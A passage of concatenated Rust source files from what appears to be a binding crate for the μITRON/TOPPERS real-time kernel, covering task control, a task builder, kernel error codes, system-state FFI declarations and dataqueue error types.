#[doc(alias = "get_pri")]
pub fn priority(self) -> Result<Priority, Error<PriorityError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut pri = MaybeUninit::uninit();
Error::err_if_negative(abi::get_pri(self.as_raw(), pri.as_mut_ptr()))?;
Ok(pri.assume_init())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `mig_tsk`: Change the task's assigned processor.
#[inline]
#[doc(alias = "mig_tsk")]
pub fn migrate(self, processor: Processor) -> Result<(), Error<MigrateError>> {
match () {
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
() => unsafe {
Error::err_if_negative(abi::mig_tsk(self.as_raw(), processor.as_raw()))?;
Ok(())
},
#[cfg(not(any(feature = "none", feature = "fmp3", feature = "solid_fmp3")))]
() => {
let Processor::UNIPROCESSOR = processor;
Ok(())
}
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `del_tsk`: Delete the task.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
#[doc(alias = "del_tsk")]
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub unsafe fn delete(self) -> Result<(), Error<DeleteError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::del_tsk(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `get_tst`: Get the task's state.
#[inline]
#[doc(alias = "get_tst")]
pub fn state(self) -> Result<State, Error<StateError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut pri = MaybeUninit::uninit();
Error::err_if_negative(abi::get_tst(self.as_raw(), pri.as_mut_ptr()))?;
Ok(State::from_abi_unchecked(pri.assume_init()))
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ref_tsk`: Get the task's general information.
#[inline]
#[doc(alias = "ref_tsk")]
pub fn info(self) -> Result<Info, Error<InfoError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut pri = MaybeUninit::uninit();
Error::err_if_negative(abi::ref_tsk(self.as_raw(), pri.as_mut_ptr()))?;
Ok(Info {
raw: pri.assume_init(),
})
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// # Synchronization
impl TaskRef<'_> {
    /// `wup_tsk`: Pend a wake up request for the task.
    ///
    /// This method and the [`sleep`] function are semantically analogous to
    /// `std::thread::Thread::unpark` and `std::thread::park`, respectively.
    /// However, unlike `unpark`, **this method will return
    /// `Err(WakeError::QueueOverflow)` if the token is already present.**
    #[inline]
    #[doc(alias = "wup_tsk")]
    #[doc(alias = "unpark")]
    pub fn wake(self) -> Result<(), Error<WakeError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::wup_tsk(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `can_wup`: Cancel any wake up requests for the task.
    /// Returns the number of cancelled requests.
    #[inline]
    #[doc(alias = "can_wup")]
    pub fn cancel_wake_all(self) -> Result<usize, Error<CancelWakeAllError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                // A non-negative return value of `can_wup` is the number of
                // cancelled wake up requests.
                let count = Error::err_if_negative(abi::can_wup(self.as_raw()))?;
                Ok(count as usize)
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `rel_wai`: Forcibly release the task from waiting.
    #[inline]
    #[doc(alias = "rel_wai")]
    pub fn release_wait(self) -> Result<(), Error<ReleaseWaitError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::rel_wai(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `sus_tsk`: Suspend the task.
    #[inline]
    #[doc(alias = "sus_tsk")]
    pub fn suspend(self) -> Result<(), Error<SuspendError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::sus_tsk(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `rsm_tsk`: Resume the task.
    ///
    /// Undoes a previous [`suspend`](Self::suspend).
    #[inline]
    #[doc(alias = "rsm_tsk")]
    pub fn resume(self) -> Result<(), Error<ResumeError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::rsm_tsk(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
/// # Termination
impl TaskRef<'_> {
    /// `ter_tsk`: Terminate the task.
    ///
    /// # Safety
    ///
    /// If the task's stack is reused later, stored local variables are
    /// destroyed without running their destructors, violating the [pinning]
    /// requirements.
    ///
    /// [pinning]: core::pin
    #[inline]
    #[doc(alias = "ter_tsk")]
    pub unsafe fn terminate(self) -> Result<(), Error<TerminateError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::ter_tsk(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `ras_ter`: Pend a termination request.
    ///
    /// See [`is_termination_disabled`] for querying whether the current task
    /// has handling of termination requests disabled.
    ///
    /// # Safety
    ///
    /// If the task's stack is reused later, stored local variables are
    /// destroyed without running their destructors, violating the [pinning]
    /// requirements.
    ///
    /// [pinning]: core::pin
    #[inline]
    #[doc(alias = "ras_ter")]
    pub unsafe fn raise_termination(self) -> Result<(), Error<RaiseTerminationError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::ras_ter(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
/// Get a reference to the current task.
///
/// This function fails if it's called from an interrupt context or the CPU
/// lock state is active.
pub fn current() -> Result<Current, BadContextError> {
    // Guard clause: outside a task context there is no "current task".
    if !super::kernel::is_task_context() {
        return Err(BadContextError(()));
    }
    current_id()
        .map(|id| Current {
            // Safety: It's allowed to get the current task's `TaskRef`.
            // The retrieved `TaskRef` will not outlive the task
            // because `Current` is `!Send`.
            inner: unsafe { TaskRef::from_raw_nonnull(id.unwrap()) },
            _no_send: PhantomData,
        })
        .map_err(|e| match e.kind() {
            CurrentIdError::BadContext(_) => BadContextError(()),
        })
}
/// Represents a reference to the current task. Returned by [`current`].
///
/// This type is `!Send`, so it cannot be sent to other threads. This ensures
/// any `TaskRef`s created from this type do not outlive the referenced task.
#[derive(Debug, Clone, Copy)]
pub struct Current {
    inner: TaskRef<'static>,
    // `*mut ()` is neither `Send` nor `Sync`, which makes `Current` `!Send`.
    _no_send: PhantomData<*mut ()>,
}
impl Current {
    /// Get the raw object ID.
    #[inline]
    pub const fn as_raw(&self) -> abi::ID {
        self.inner.as_raw()
    }
    /// Get the raw object ID as [`abi::NonNullID`].
    #[inline]
    pub const fn as_raw_nonnull(&self) -> abi::NonNullID {
        self.inner.as_raw_nonnull()
    }
    /// Borrow `Current` as [`TaskRef`].
    ///
    /// Use this to perform operations on tasks because most of the methods
    /// are implemented on `TaskRef` but not `Current`.
    #[inline]
    pub const fn as_ref(&self) -> TaskRef<'_> {
        self.inner
    }
}
#[cfg(feature = "dcre")]
pub use self::owned::*;
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
mod owned {
    use super::*;
    /// An instance of [`IntoProcessorSet`] specifying all processors.
    #[derive(Debug, Default, Clone, Copy, PartialEq, Eq)]
    pub struct AllProcessors;
    pub use self::processor_set::*;
    #[cfg(feature = "solid_fmp3")]
    mod processor_set {
        use super::*;
        use core::convert::TryFrom;
        /// The trait implemented by types that can be passed to
        /// [`crate::task::Builder::processor_affinity`]. This trait is [sealed].
        ///
        /// [sealed]: https://rust-lang.github.io/api-guidelines/future-proofing.html#sealed-traits-protect-against-downstream-implementations-c-sealed
        #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
        pub trait IntoProcessorSet: private::Sealed + Sized {
            #[doc(hidden)]
            fn into_uint_t(self) -> abi::uint_t;
        }
        impl<T: IntoIterator<Item = Processor>> IntoProcessorSet for T {
            #[doc(hidden)]
            #[inline]
            fn into_uint_t(self) -> abi::uint_t {
                // OR together the affinity bit of every processor in the set.
                self.into_iter()
                    .fold(0, |st, processor| st | processor.into_uint_t())
            }
        }
        impl IntoProcessorSet for Processor {
            #[allow(clippy::unnecessary_cast)] // <https://github.com/rust-lang/rust-clippy/issues/6923>
            #[doc(hidden)]
            #[inline]
            fn into_uint_t(self) -> abi::uint_t {
                // Processor IDs are 1-based; bit `N - 1` represents
                // processor `N`. `checked_shl` catches out-of-range IDs.
                u32::try_from(self.as_raw() - 1)
                    .ok()
                    .and_then(|i| (1 as abi::uint_t).checked_shl(i))
                    .expect("invalid processor ID")
            }
        }
        impl IntoProcessorSet for AllProcessors {
            #[doc(hidden)]
            #[inline]
            fn into_uint_t(self) -> abi::uint_t {
                abi::uint_t::MAX
            }
        }
    }
    #[cfg(not(feature = "solid_fmp3"))]
    mod processor_set {
        use super::*;
        /// The trait implemented by types that can be passed to
        /// [`crate::task::Builder::processor_affinity`]. This trait is [sealed].
        ///
        /// [sealed]: https://rust-lang.github.io/api-guidelines/future-proofing.html#sealed-traits-protect-against-downstream-implementations-c-sealed
        #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
        pub trait IntoProcessorSet: private::Sealed + Sized {
            #[doc(hidden)]
            fn assert_non_empty(self);
        }
        impl<T: IntoIterator<Item = Processor>> IntoProcessorSet for T {
            #[doc(hidden)]
            #[inline]
            fn assert_non_empty(self) {
                assert!(
                    self.into_iter().next().is_some(),
                    "affinity processor set is empty"
                );
            }
        }
        impl IntoProcessorSet for Processor {
            #[doc(hidden)]
            #[inline]
            fn assert_non_empty(self) {}
        }
        impl IntoProcessorSet for AllProcessors {
            #[doc(hidden)]
            #[inline]
            fn assert_non_empty(self) {}
        }
    }
    /// Implements [the sealed trait pattern (C-SEALED)].
    ///
    /// [the sealed trait pattern (C-SEALED)]: https://rust-lang.github.io/api-guidelines/future-proofing.html#sealed-traits-protect-against-downstream-implementations-c-sealed
    mod private {
        use super::*;
        pub trait Sealed {}
        impl<T: IntoIterator<Item = Processor>> Sealed for T {}
        impl Sealed for Processor {}
        impl Sealed for AllProcessors {}
    }
    /// The builder type for [tasks](Task). Created by [`Task::build`].
    ///
    /// Its generic parameters are an implementation detail.
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    #[must_use = "`Builder` creates nothing unless you call `.finish()`"]
    pub struct Builder<Start, Stack, InitialPriority> {
        start: Start,
        stack: Stack,
        initial_priority: InitialPriority,
        // When `true`, `finish` assigns the new task to the processor on
        // which `finish` itself runs. (Renamed from the misspelled
        // `assign_to_current_procesor`; the field is private, so the rename
        // is invisible to downstream users.)
        assign_to_current_processor: bool,
        #[cfg(not(feature = "none"))]
        raw: abi::T_CTSK,
    }
    /// Builder field hole types
    #[allow(non_camel_case_types)]
    #[doc(hidden)]
    pub mod builder_hole {
        pub struct __start_is_not_specified__;
        pub struct __stack_is_not_specified__;
        pub struct __initial_priority_is_not_specified__;
    }
    impl Task {
        /// `acre_tsk`: Create a builder for `Task`.
        ///
        /// # Example
        ///
        /// ```rust,no_run
        /// use itron::task::Task;
        /// let captured_variable = 42u16;
        /// let task = Task::build()
        ///     .start(move || { let _ = captured_variable; })
        ///     .stack_size(4096)
        ///     .initial_priority(4)
        ///     .finish_and_activate()
        ///     .expect("failed to create a task");
        ///
        /// task.as_ref().wake().expect("failed to send a wake up request to the created task");
        ///
        /// // The created task might be still active, so if we just let `task`
        /// // go out of scope, its destructor will panic. `Task::leak` consumes
        /// // `Task` and prevents the destructor from running.
        /// task.leak();
        /// ```
        #[inline]
        #[doc(alias = "acre_tsk")]
        pub fn build() -> Builder<
            builder_hole::__start_is_not_specified__,
            builder_hole::__stack_is_not_specified__,
            builder_hole::__initial_priority_is_not_specified__,
        > {
            Builder {
                start: builder_hole::__start_is_not_specified__,
                stack: builder_hole::__stack_is_not_specified__,
                initial_priority: builder_hole::__initial_priority_is_not_specified__,
                assign_to_current_processor: true,
                #[cfg(any(feature = "asp3", feature = "solid_asp3"))]
                raw: abi::T_CTSK {
                    tskatr: abi::TA_NULL,
                    exinf: abi::EXINF::uninit(),
                    task: None,
                    itskpri: 0,
                    stksz: 0,
                    stk: core::ptr::null_mut(),
                },
                #[cfg(feature = "solid_fmp3")]
                raw: abi::T_CTSK {
                    tskatr: abi::TA_NULL,
                    exinf: abi::EXINF::uninit(),
                    task: None,
                    itskpri: 0,
                    stksz: 0,
                    stk: core::ptr::null_mut(),
                    affinity: abi::uint_t::MAX,
                    iprcid: 0,
                },
            }
        }
    }
    impl<Start, Stack, InitialPriority> Builder<Start, Stack, InitialPriority> {
        /// (**Mandatory**) Specify the entry point.
        #[inline]
        pub fn start(
            self,
            value: impl crate::closure::IntoClosure + Send,
        ) -> Builder<(), Stack, InitialPriority> {
            let (task, exinf) = value.into_closure();
            Builder {
                // FIXME: Use the struct update syntax when rust-lang/rfcs#2528
                // is implemented
                start: (),
                stack: self.stack,
                initial_priority: self.initial_priority,
                assign_to_current_processor: self.assign_to_current_processor,
                #[cfg(not(feature = "none"))]
                raw: abi::T_CTSK {
                    task: Some(task),
                    exinf,
                    ..self.raw
                },
            }
        }
        /// (**Mandatory**) Specify to use an automatically allocated stack
        /// region of the specified size.
        #[inline]
        pub fn stack_size(self, size: usize) -> Builder<Start, (), InitialPriority> {
            Builder {
                start: self.start,
                stack: (),
                initial_priority: self.initial_priority,
                assign_to_current_processor: self.assign_to_current_processor,
                #[cfg(not(feature = "none"))]
                raw: abi::T_CTSK {
                    stksz: size,
                    // A null `stk` requests automatic allocation.
                    stk: core::ptr::null_mut(),
                    ..self.raw
                },
            }
        }
        /// (**Mandatory**) Specify the initial priority.
        #[inline]
        pub fn initial_priority(self, value: Priority) -> Builder<Start, Stack, ()> {
            Builder {
                start: self.start,
                stack: self.stack,
                initial_priority: (),
                assign_to_current_processor: self.assign_to_current_processor,
                #[cfg(not(feature = "none"))]
                raw: abi::T_CTSK {
                    itskpri: value,
                    ..self.raw
                },
            }
        }
        /// Specify the task's initial assigned processor. Defaults to the
        /// current processor when unspecified.
        #[inline]
        pub fn initial_processor(self, value: Processor) -> Self {
            // On uniprocessor kernels `Processor::UNIPROCESSOR` is the only
            // valid choice; the irrefutable pattern enforces this statically.
            #[cfg(not(feature = "solid_fmp3"))]
            let Processor::UNIPROCESSOR = value;
            Builder {
                assign_to_current_processor: false,
                #[cfg(feature = "solid_fmp3")]
                raw: abi::T_CTSK {
                    iprcid: value.as_raw(),
                    ..self.raw
                },
                ..self
            }
        }
        /// Specify the task's assignable processor set. Defaults to all
        /// processors when unspecified.
        ///
        /// This function might panic if an invalid processor ID is specified
        /// or the set is empty.
        ///
        /// # Examples
        ///
        /// ```rust,no_run
        /// #![feature(const_option)]
        /// use itron::{task::Task, processor::Processor};
        /// let processor = itron::processor::current().unwrap();
        /// let task = Task::build()
        ///     .start(move || {})
        ///     .stack_size(4096)
        ///     .initial_priority(4)
        ///     .initial_processor(processor)
        ///     .processor_affinity([processor])
        ///     .finish()
        ///     .expect("failed to create a task");
        /// ```
        #[inline]
        pub fn processor_affinity(self, value: impl IntoProcessorSet) -> Self {
            // On a uniprocessor system, panic when an empty set is given
            // because it's a very pathological condition, and we don't want to
            // go to the length of making `finish` return `E_PAR` for such a
            // condition
            #[cfg(not(feature = "solid_fmp3"))]
            value.assert_non_empty();
            Builder {
                #[cfg(feature = "solid_fmp3")]
                raw: abi::T_CTSK {
                    affinity: value.into_uint_t(),
                    ..self.raw
                },
                ..self
            }
        }
    }
    impl Builder<(), (), ()> {
        /// Create a task using the specified parameters.
        #[allow(unused_mut)]
        pub fn finish(mut self) -> Result<Task, Error<BuildError>> {
            // Resolve "assign to the current processor" to a concrete
            // processor ID immediately before creating the task.
            #[cfg(feature = "solid_fmp3")]
            if self.assign_to_current_processor {
                unsafe { Error::err_if_negative(abi::get_pid(&mut self.raw.iprcid))? };
            }
            match () {
                #[cfg(not(feature = "none"))]
                () => unsafe {
                    let id = Error::err_if_negative(abi::acre_tsk(&self.raw))?;
                    // Safety: We own the task we create
                    Ok(Task::from_raw_nonnull(abi::NonNullID::new_unchecked(id)))
                },
                #[cfg(feature = "none")]
                () => unimplemented!(),
            }
        }
        /// Create and activate a task using the specified parameters.
        #[allow(unused_mut)]
        #[doc(alias = "TA_ACT")]
        pub fn finish_and_activate(mut self) -> Result<Task, Error<BuildError>> {
            // `TA_ACT` makes the kernel activate the task upon creation.
            #[cfg(not(feature = "none"))]
            {
                self.raw.tskatr |= abi::TA_ACT;
            }
            self.finish()
        }
    }
    /// An owned task.
    ///
    /// [Deletes] the task automatically when dropped. The destructor will
    /// panic if the deletion fails.
    ///
    /// [Deletes]: TaskRef::delete
    #[derive(PartialEq, Eq)]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub struct Task(TaskRef<'static>);
    impl fmt::Debug for Task {
        #[inline]
        fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
            self.0.fmt(f)
        }
    }
    impl Drop for Task {
        #[inline]
        fn drop(&mut self) {
            // Panics if the kernel rejects the deletion (e.g. the task is
            // still active).
            unsafe { self.0.delete().unwrap() };
        }
    }
    impl Task {
        /// Construct a `Task` from a raw object ID.
        ///
        /// # Safety
        ///
        /// See [Object ID Wrappers](crate#object-id-wrappers).
        #[inline]
        pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
            Self(unsafe { TaskRef::from_raw_nonnull(id) })
        }
        /// Consume and "leak" `self`, returning a reference `TaskRef<'a>`.
        #[inline]
        pub const fn leak<'a>(self) -> TaskRef<'a> {
            let out = self.0;
            // Skip `Drop::drop` so the underlying task is not deleted.
            core::mem::forget(self);
            out
        }
        /// Get the raw object ID.
        #[inline]
        pub const fn as_raw(&self) -> abi::ID {
            self.0.as_raw()
        }
        /// Get the raw object ID as [`abi::NonNullID`].
        #[inline]
        pub const fn as_raw_nonnull(&self) -> abi::NonNullID {
            self.0.as_raw_nonnull()
        }
        /// Borrow `Task` as [`TaskRef`].
        ///
        /// Use this to perform operations on tasks because most of the methods
        /// are implemented on `TaskRef` but not `Task`.
        #[inline]
        pub const fn as_ref(&self) -> TaskRef<'_> {
            self.0
        }
    }
}
<file_sep>/src/abi/error.rs
use super::ER;
// μITRON/TOPPERS service call error codes. Zero means success; all error
// codes are negative.
/// Normal completion
pub const E_OK: ER = 0;
/// System error
pub const E_SYS: ER = -5;
/// Unsupported function
pub const E_NOSPT: ER = -9;
/// Reserved function code
pub const E_RSFN: ER = -10;
/// Reserved attribute
pub const E_RSATR: ER = -11;
/// Parameter error
pub const E_PAR: ER = -17;
/// Invalid ID number
pub const E_ID: ER = -18;
/// Context error
pub const E_CTX: ER = -25;
/// Memory access violation
pub const E_MACV: ER = -26;
/// Object access violation
pub const E_OACV: ER = -27;
/// Illegal use of a service call
pub const E_ILUSE: ER = -28;
/// Insufficient memory
pub const E_NOMEM: ER = -33;
/// No ID number available
pub const E_NOID: ER = -34;
/// Insufficient resources
pub const E_NORES: ER = -35;
/// Object state error
pub const E_OBJ: ER = -41;
/// Object not created
pub const E_NOEXS: ER = -42;
/// Queueing overflow
pub const E_QOVR: ER = -43;
/// Forced release from the waiting state
pub const E_RLWAI: ER = -49;
/// Polling failure or timeout
pub const E_TMOUT: ER = -50;
/// Waiting object deleted
pub const E_DLT: ER = -51;
/// Waiting object state changed
pub const E_CLS: ER = -52;
/// Task termination request
pub const E_RASTER: ER = -53;
/// Non-blocking call accepted
pub const E_WBLK: ER = -57;
/// Buffer overflow
pub const E_BOVR: ER = -58;
/// Communication error
pub const E_COMM: ER = -65;
<file_sep>/src/prioritydataqueue.rs
//! Priority dataqueues (TODO)
// TODO: acre_pdq
// TODO: del_pdq
// TODO: snd_pdq
// TODO: psnd_pdq
// TODO: tsnd_pdq
// TODO: rcv_pdq
// TODO: prcv_pdq
// TODO: trcv_pdq
// TODO: ini_pdq
// TODO: ref_pdq
<file_sep>/src/abi/system.rs
use super::{bool_t, uint_t, ER, ID, PRI};
/// System state management functions
#[cfg(any(
    feature = "asp3",
    feature = "fmp3",
    feature = "solid_asp3",
    feature = "solid_fmp3"
))]
extern "C" {
    /// Rotate the ready queue of the given priority level.
    pub fn rot_rdq(tskpri: PRI) -> ER;
    /// Get the currently running task's ID.
    pub fn get_tid(p_tskid: *mut ID) -> ER;
    /// Get the system load for the given priority — see the TOPPERS
    /// specification for the exact metric.
    pub fn get_lod(tskpri: PRI, p_load: *mut uint_t) -> ER;
    /// Get the ID of the `nth` task for the given priority.
    pub fn get_nth(tskpri: PRI, nth: uint_t, p_tskid: *mut ID) -> ER;
    /// Acquire the CPU lock.
    pub fn loc_cpu() -> ER;
    /// Release the CPU lock.
    pub fn unl_cpu() -> ER;
    /// Disable dispatching.
    pub fn dis_dsp() -> ER;
    /// Enable dispatching.
    pub fn ena_dsp() -> ER;
    /// Check whether the calling context is a non-task context.
    pub fn sns_ctx() -> bool_t;
    /// Check whether the CPU lock state is active.
    pub fn sns_loc() -> bool_t;
    /// Check whether dispatching is disabled.
    pub fn sns_dsp() -> bool_t;
    /// Check whether dispatching is pending.
    pub fn sns_dpn() -> bool_t;
    /// Check whether the kernel is not operating.
    pub fn sns_ker() -> bool_t;
    /// Terminate the kernel.
    pub fn ext_ker() -> ER;
}
// Multiprocessor (FMP3) variants of the above.
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
extern "C" {
    /// Rotate the ready queue of the given priority on the specified
    /// processor.
    pub fn mrot_rdq(tskpri: PRI, prcid: ID) -> ER;
    /// Get the calling processor's ID.
    pub fn get_pid(p_prcid: *mut ID) -> ER;
    /// Get the system load for the given priority on the specified
    /// scheduling domain.
    pub fn mget_lod(schedid: ID, tskpri: PRI, p_load: *mut uint_t) -> ER;
    /// Get the ID of the `nth` task for the given priority on the specified
    /// scheduling domain.
    pub fn mget_nth(schedid: ID, tskpri: PRI, nth: uint_t, p_tskid: *mut ID) -> ER;
}
<file_sep>/src/dataqueue.rs
//! Dataqueues
use core::{fmt, marker::PhantomData, mem::MaybeUninit};
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind, Kind},
time::Timeout,
};
define_error_kind! {
    /// Error type for [`DataqueueRef::send`].
    pub enum SendError {
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        #[cfg(not(feature = "none"))]
        BadId,
        // `cfg(any())` never matches; kept for kernels with access
        // protection.
        #[cfg(any())]
        AccessDenied,
        #[cfg(not(feature = "none"))]
        Released,
        #[cfg(not(feature = "none"))]
        TerminateRequest,
        #[cfg(all(not(feature = "none"), feature = "dcre"))]
        Deleted,
    }
}
// Translate raw kernel error codes into `SendError` variants; unlisted
// codes yield `None`.
impl ErrorKind for SendError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            // Both "invalid ID" and "object does not exist" map to `BadId`.
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "dcre"))]
            abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`DataqueueRef::send_timeout`].
    pub enum SendTimeoutError {
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        #[cfg(not(feature = "none"))]
        BadId,
        // `cfg(any())` never matches; kept for kernels with access
        // protection.
        #[cfg(any())]
        AccessDenied,
        #[cfg(not(feature = "none"))]
        Timeout,
        #[cfg(not(feature = "none"))]
        Released,
        #[cfg(not(feature = "none"))]
        TerminateRequest,
        #[cfg(all(not(feature = "none"), feature = "dcre"))]
        Deleted,
    }
}
// Translate raw kernel error codes into `SendTimeoutError` variants;
// unlisted codes yield `None`.
impl ErrorKind for SendTimeoutError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // E_PAR is considered critical, hence excluded
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            // Both "invalid ID" and "object does not exist" map to `BadId`.
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "dcre"))]
            abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`DataqueueRef::try_send`].
    pub enum TrySendError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        // `cfg(any())` never matches; kept for kernels with access
        // protection.
        #[cfg(any())]
        AccessDenied,
        /// `E_TMOUT` from a polling send indicates a polling failure
        /// rather than an elapsed timeout.
        #[cfg(not(feature = "none"))]
        Timeout,
    }
}
// Translate raw kernel error codes into `TrySendError` variants; unlisted
// codes yield `None`.
impl ErrorKind for TrySendError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`DataqueueRef::send_forced`].
    pub enum SendForcedError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        // `cfg(any())` never matches; kept for kernels with access
        // protection.
        #[cfg(any())]
        AccessDenied,
        /// The queue length is zero.
        #[cfg(not(feature = "none"))]
        ZeroSized,
    }
}
// Translate raw kernel error codes into `SendForcedError` variants;
// unlisted codes yield `None`.
impl ErrorKind for SendForcedError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            // `E_ILUSE` (illegal use) is reported for a zero-length queue.
            #[cfg(not(feature = "none"))]
            abi::E_ILUSE => Some(Self::ZeroSized(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`DataqueueRef::recv`].
    pub enum RecvError {
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        #[cfg(not(feature = "none"))]
        BadId,
        // `cfg(any())` never matches; kept for kernels with access
        // protection.
        #[cfg(any())]
        AccessDenied,
        #[cfg(not(feature = "none"))]
        Released,
        #[cfg(not(feature = "none"))]
        TerminateRequest,
        #[cfg(all(not(feature = "none"), feature = "dcre"))]
        Deleted,
    }
}
// Translate raw kernel error codes into `RecvError` variants; unlisted
// codes yield `None`.
impl ErrorKind for RecvError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            // Both "invalid ID" and "object does not exist" map to `BadId`.
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "dcre"))]
            abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
